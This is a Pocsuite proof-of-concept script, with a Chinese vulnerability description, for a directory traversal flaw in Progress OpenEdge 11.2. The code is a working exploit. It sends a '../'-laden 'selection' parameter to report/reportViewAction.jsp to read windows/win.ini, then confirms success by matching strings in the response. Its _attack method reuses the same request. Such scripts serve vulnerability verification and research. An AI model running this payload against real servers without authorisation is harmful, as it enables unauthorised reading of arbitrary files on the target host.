Progress OpenEdge 11.2 - Directory Traversal

                                                #!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-87398'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2014-10-31'
    createDate = '2015-10-19'
    updateDate = '2015-10-19'
    references = ['https://www.exploit-db.com/exploits/35127/']
    name = 'Progress OpenEdge 11.2 - Directory Traversal'
    appPowerLink = 'www.progress.com/products/openedge'
    appName = 'Progress OpenEdge'
    appVersion = '11.2'
    vulType = 'Path Traversal'
    desc = '''
        Progress Software OpenEdge是美国Progress Software公司的一套电子商务平台，
        它通过集成开发环境（IDE）以加快应用程序开发的进度，也能够与任何数据库、用户界面（UI）
        和操作系统兼容使用。Progress Software OpenEdge 11.2版本的report/reportViewAction.jsp脚本中
        存在目录遍历漏洞。远程攻击者可借助‘selection’参数中目录遍历字符‘..’利用该漏洞读取任意文件。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        payload = ':9090/report/reportViewAction.jsp?selection=../../../../../../../../../../windows/win.ini'
        verify_url = self.url + payload
        res = req.get(verify_url)
        return self.parse_res(res)

    def _attack(self):   
        return self._verify()

    def parse_res(self, res):
        output = Output(self)
        result = {}
        if 'CMCDLLNAME32=mapi32.dll' in res.content and 'MAPIXVER=1.0.0.1' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            output.success(result)           
        else:
            output.fail('Path Traversal Failed')
        return output

register(TestPOC)